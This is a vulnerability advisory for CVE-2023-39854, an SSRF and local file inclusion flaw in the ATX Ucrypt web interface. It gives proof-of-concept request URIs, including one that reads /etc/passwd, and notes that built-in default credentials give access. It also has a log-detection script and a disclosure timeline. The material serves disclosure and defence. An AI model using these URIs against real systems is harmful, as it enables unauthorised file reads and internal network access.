CVE-2023-39854
Summary
The web interface of ATX Ucrypt (v3.5 and older) is vulnerable to a Server Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerability, allowing authenticated users (or attackers using default credentials for the admin, master or user account) to access remote hosts and system files.
Version Impacted
ATX Ucrypt v3.5 and older
Vulnerability Details
An authenticated user, or an attacker using the default credentials for the admin, master or user account, can access remote web endpoints or local system files using the following URIs:
/hydra/view/get_cc_url?board_id=2&url=file%3A%2F%2F%2Fetc%2Fpasswd
/hydra/view/get_cc_url?board_id=1&url=https%3A%2F%2Fgoogle.com%3A443%2F
An example of a vulnerable host:
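Defenders who cannot patch (no vendor fix exists) can at least watch for abuse of this endpoint in web server access logs. The following detection helper is an added example, not code from the advisory or from ATX; the log lines are constructed, and the allowlisted hostname `cc.example.internal` is an assumption standing in for whatever hosts a given deployment legitimately fetches from. It flags requests to `/hydra/view/get_cc_url` whose `url` parameter uses a non-HTTP scheme (the file:// LFI case) or points at a host outside the allowlist (the SSRF case).

```python
"""Access-log detection for CVE-2023-39854 abuse (added example, not vendor code)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/hydra/view/get_cc_url"
# Assumed allowlist: hosts the Ucrypt UI is expected to fetch from in your deployment.
ALLOWED_HOSTS = {"cc.example.internal"}

# Matches the request and status fields of a combined-log-format line.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines: an LFI attempt, an SSRF attempt, a benign fetch, an unrelated page.
LOG_LINES = [
    '10.0.0.5 - admin [07/Oct/2023:12:00:01 +0000] "GET /hydra/view/get_cc_url?board_id=2&url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1422',
    '10.0.0.5 - admin [07/Oct/2023:12:00:09 +0000] "GET /hydra/view/get_cc_url?board_id=1&url=https%3A%2F%2Fgoogle.com%3A443%2F HTTP/1.1" 200 5310',
    '10.0.0.7 - user [07/Oct/2023:12:01:00 +0000] "GET /hydra/view/get_cc_url?board_id=1&url=https%3A%2F%2Fcc.example.internal%2Fstatus HTTP/1.1" 200 210',
    '10.0.0.7 - user [07/Oct/2023:12:01:05 +0000] "GET /hydra/view/index HTTP/1.1" 200 8801',
]


def classify_request(request_target: str) -> Optional[str]:
    """Return 'lfi', 'ssrf' or None for one request path plus query string."""
    parts = urlsplit(request_target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes the value, so %3A%2F%2F becomes :// here.
    target = parse_qs(parts.query).get("url", [None])[0]
    if target is None:
        return None
    fetched = urlsplit(target)
    if fetched.scheme not in ("http", "https"):
        return "lfi"  # file:// and other non-web schemes reach the local filesystem
    if (fetched.hostname or "") in ALLOWED_HOSTS:
        return None
    return "ssrf"  # web fetch to a host the interface has no business contacting


def scan_log(lines: List[str]) -> List[Tuple[int, str, str, int]]:
    """Return (line_no, kind, request_target, status) for every flagged request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        kind = classify_request(match.group(1))
        if kind:
            hits.append((line_no, kind, match.group(1), int(match.group(2))))
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

A 200 status on a flagged line means the fetch or file read succeeded, which is the case to escalate first.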
Recommended Mitigations
Multiple attempts have been made to responsibly disclose the issue to the vendor so that the root cause of this vulnerability could be addressed, but no response was received.
Users are advised to audit all users of their deployment and ensure that they have rotated the default credentials for the admin, master and user accounts that this service has baked in.
Disclosure Timeline
| Date | Event |
| --- | --- |
| Jul 18, 2023 | First attempt made to contact ATX Networks on their marketing and security email. |
| Aug 15, 2023 | Second attempt made to contact ATX Networks on their marketing and security email. |
| Aug 19, 2023 | Case opened with CERT Coordination Center (CERT/CC) to assist with responsible disclosure. |
| Aug 21, 2023 | CERT/CC's time window for responsible disclosure begins (Case VU#293164). |
| Oct 05, 2023 | Two attempts made by CERT/CC within the window receive no response and the 45-day window ends. |
| Oct 05, 2023 | CVE number assigned by MITRE. |
| Oct 07, 2023 | Responsible public disclosure. |